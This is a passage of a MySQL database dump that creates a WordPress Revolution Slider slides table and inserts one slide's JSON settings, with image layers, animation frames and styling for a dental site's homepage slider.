-- Tablo için tablo yapısı `zdenl_revslider_slides`
--

CREATE TABLE `zdenl_revslider_slides` (
  `id` int(9) NOT NULL,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Tablo döküm verisi `zdenl_revslider_slides`
--

INSERT INTO `zdenl_revslider_slides` (`id`, `slider_id`, `slide_order`, `params`, `layers`, `settings`) VALUES
(1, 1, 1, '{\"background_type\":\"image\",\"image\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/slider-1-bg.jpg\",\"title\":\"Slide\",\"state\":\"unpublished\",\"date_from\":\"\",\"date_to\":\"\",\"slide_transition\":[\"fade\"],\"0\":\"Remove\",\"slot_amount\":[\"7\"],\"transition_rotation\":[\"0\"],\"transition_duration\":[\"300\"],\"delay\":\"4970\",\"enable_link\":\"false\",\"link_type\":\"regular\",\"link\":\"\",\"link_open_in\":\"same\",\"slide_link\":\"nothing\",\"link_pos\":\"front\",\"slide_thumb\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"slide_bg_color\":\"#E7E7E7\",\"slide_bg_external\":\"\",\"bg_fit\":\"cover\",\"bg_fit_x\":\"100\",\"bg_fit_y\":\"100\",\"bg_repeat\":\"no-repeat\",\"bg_position\":\"center center\",\"bg_position_x\":\"0\",\"bg_position_y\":\"0\",\"kenburn_effect\":\"off\",\"kb_start_fit\":\"100\",\"kb_end_fit\":\"100\",\"bg_end_position\":\"center top\",\"kb_duration\":\"6000\",\"kb_easing\":\"Linear.easeNone\",\"save_performance\":\"off\",\"class_attr\":\"\",\"id_attr\":\"\",\"attr_attr\":\"\",\"data_attr\":\"\",\"bg_end_position_x\":\"0\",\"bg_end_position_y\":\"0\",\"image_source_type\":\"full\",\"rs-gallery-type\":\"gallery\",\"bg_external\":\"\",\"bg_color\":\"#E7E7E7\",\"slide_bg_youtube\":\"\",\"slide_bg_vimeo\":\"\",\"slide_bg_html_mpeg\":\"\",\"slide_bg_html_webm\":\"\",\"slide_bg_html_ogv\":\"\",\"alt_option\":\"media_library\",\"alt_attr\":\"\",\"ext_width\":\"1920\",\"ext_height\":\"1080\",\"title_option\":\"media_library\",\"title_attr\":\"\",\"video_force_cover\":\"on\",\"video_dotted_overlay\":\"none\",\"video_ratio\":\"16:9\",\"video_start_at\":\"\",\"video_end_at\":\"\",\"video_loop\":\"none\",\"video_nextslide\":\"off\",\"video_force_rewind\":\"on\",\"video_mute\":\"on\",\"video_volume\":\"\",\"video_speed\":\"1\",\"video_arguments\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"video_arguments_vim\":\"title=0&byline=0&portrait=0&api=1\",\"media-filter-type\":\"none\",\"kb_start_offset_x\":\"0\",\"kb_end_offset_x\":\"0\",\"kb_start_offset_y\":\"0\",\"kb_end_offset_y\":\"0\",\"kb_start_rotate\":\"0\",\"kb_end_rotate\":\"0\",\"stoponpurpose\":\"false\",\"invisibleslide\":\"false\",\"hideslideafter\":\"0\",\"hideslideonmobile\":\"off\",\"thumb_dimension\":\"slider\",\"thumb_for_admin\":\"off\",\"transition_ease_in\":[\"default\"],\"transition_ease_out\":[\"default\"],\"ph-round-tabs-font-family-font_family-slide\":\"off\",\"ph-round-tabs-font-family-font_family\":\"Roboto\",\"ph-round-tabs-border-color-color-rgba-slide\":\"off\",\"ph-round-tabs-border-color-color-rgba\":\"#e5e5e5\",\"ph-round-tabs-border-size-custom-slide\":\"off\",\"ph-round-tabs-border-size-custom\":\"1\",\"ph-round-tabs-image-size-custom-slide\":\"off\",\"ph-round-tabs-image-size-custom\":\"60\",\"ph-round-tabs-param1-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param1-color-color-rgba\":\"rgba(51,51,51,0.5)\",\"ph-round-tabs-param1-size-custom-slide\":\"off\",\"ph-round-tabs-param1-size-custom\":\"12\",\"ph-round-tabs-hover-bg-color-color-rgba-slide\":\"off\",\"ph-round-tabs-hover-bg-color-color-rgba\":\"#eeeeee\",\"ph-round-tabs-bgcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-bgcolor-color-rgba\":\"rgba(0,0,0,0)\",\"ph-round-tabs-contentcolor-color-rgba-slide\":\"off\",\"ph-round-tabs-contentcolor-color-rgba\":\"#333333\",\"ph-round-tabs-param2-color-color-rgba-slide\":\"off\",\"ph-round-tabs-param2-color-color-rgba\":\"transparent\",\"ph-round-tabs-param2-size-custom-slide\":\"off\",\"ph-round-tabs-param2-size-custom\":\"14\",\"ph-round-thumbs-title-bg-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-bg-color-rgba\":\"rgba(0,0,0,0.85)\",\"ph-round-thumbs-title-color-color-rgba-slide\":\"off\",\"ph-round-thumbs-title-color-color-rgba\":\"#ffffff\",\"ph-round-thumbs-title-font-size-custom-slide\":\"off\",\"ph-round-thumbs-title-font-size-custom\":\"12\",\"params_1\":\"\",\"params_1_chars\":\"10\",\"params_2\":\"\",\"params_2_chars\":\"10\",\"params_3\":\"\",\"params_3_chars\":\"10\",\"params_4\":\"\",\"params_4_chars\":\"10\",\"params_5\":\"\",\"params_5_chars\":\"10\",\"params_6\":\"\",\"params_6_chars\":\"10\",\"params_7\":\"\",\"params_7_chars\":\"10\",\"params_8\":\"\",\"params_8_chars\":\"10\",\"params_9\":\"\",\"params_9_chars\":\"10\",\"params_10\":\"\",\"params_10_chars\":\"10\",\"slide_description\":\"\",\"slide_parallax_level\":\"-\",\"kb_blur_start\":\"0\",\"kb_blur_end\":\"0\",\"image_id\":\"6432\",\"0\":\"Remove\"}', '[{\"style\":\"\",\"text\":\"Image 9\",\"type\":\"image\",\"image_url\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/logo-slider-y.png\",\"scaleProportional\":true,\"scaleX\":{\"desktop\":\"397px\"},\"scaleY\":{\"desktop\":\"350px\"},\"originalWidth\":353,\"originalHeight\":311,\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":300,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":600,\"animation\":\"SlideMaskFromLeft\",\"easing\":\"Power3.easeInOut\",\"time_relative\":300,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4860,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"Power3.easeInOut\",\"time_relative\":3960,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":10,\"left\":{\"desktop\":-355},\"top\":{\"desktop\":95},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"logo\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":true,\"mask_end\":true,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0px\",\"mask_y_start\":\"0px\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\"},\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"center\"},\"align_vert\":{\"desktop\":\"bottom\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":397,\"height\":350,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"20\"},\"line-height\":{\"desktop\":\"22\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"[-100%]\",\"y_start\":\"inherit\",\"z_start\":\"0\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"inherit\",\"opacity_end\":\"0\",\"x_rotate_start\":\"0deg\",\"y_rotate_start\":\"0\",\"z_rotate_start\":\"0\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"1\",\"scale_y_start\":\"1\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"0\",\"skew_y_start\":\"0\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"Open Sans\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"parallax\":\"4\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":0,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"displaymode\":true,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":5,\"positionLeftReset\":0,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"style\":\"\",\"text\":\"Image 5\",\"type\":\"image\",\"image_url\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/z-y.png\",\"scaleProportional\":true,\"scaleX\":{\"desktop\":\"136px\"},\"scaleY\":{\"desktop\":\"140px\"},\"originalWidth\":185,\"originalHeight\":191,\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":450,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":600,\"animation\":\"SlideMaskFromRight\",\"easing\":\"Power3.easeInOut\",\"time_relative\":450,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4860,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"Power3.easeInOut\",\"time_relative\":3810,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":6,\"left\":{\"desktop\":-112},\"top\":{\"desktop\":0},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"z\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":true,\"mask_end\":true,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0px\",\"mask_y_start\":\"0px\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\"},\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"center\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":136,\"height\":140,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"20\"},\"line-height\":{\"desktop\":\"22\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"[100%]\",\"y_start\":\"inherit\",\"z_start\":\"0\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"inherit\",\"opacity_end\":\"0\",\"x_rotate_start\":\"0deg\",\"y_rotate_start\":\"0\",\"z_rotate_start\":\"0\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"1\",\"scale_y_start\":\"1\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"0\",\"skew_y_start\":\"0\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"Open Sans\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"parallax\":\"2\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":1,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"displaymode\":true,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":6,\"positionLeftReset\":20,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"style\":\"\",\"text\":\"Image 10\",\"type\":\"image\",\"image_url\":\"http:\\/\\/www.ze-dent.com\\/wp-content\\/uploads\\/2018\\/07\\/e-y-y.png\",\"scaleProportional\":true,\"scaleX\":{\"desktop\":\"136px\"},\"scaleY\":{\"desktop\":\"140px\"},\"originalWidth\":185,\"originalHeight\":191,\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":600,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":600,\"animation\":\"SlideMaskFromLeft\",\"easing\":\"Power3.easeInOut\",\"time_relative\":600,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4860,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"Power3.easeInOut\",\"time_relative\":3660,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":11,\"left\":{\"desktop\":-13},\"top\":{\"desktop\":0},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"r\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":true,\"mask_end\":true,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0px\",\"mask_y_start\":\"0px\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\"},\"video_width\":{\"desktop\":\"480px\"},\"video_height\":{\"desktop\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"center\"},\"align_vert\":{\"desktop\":\"middle\"},\"hiddenunder\":false,\"resizeme\":true,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":136,\"height\":140,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"20\"},\"line-height\":{\"desktop\":\"22\"},\"font-weight\":{\"desktop\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\"},\"x_start\":\"[-100%]\",\"y_start\":\"inherit\",\"z_start\":\"0\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"inherit\",\"opacity_end\":\"0\",\"x_rotate_start\":\"0deg\",\"y_rotate_start\":\"0\",\"z_rotate_start\":\"0\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"1\",\"scale_y_start\":\"1\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"0\",\"skew_y_start\":\"0\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"Open Sans\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"parallax\":\"6\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 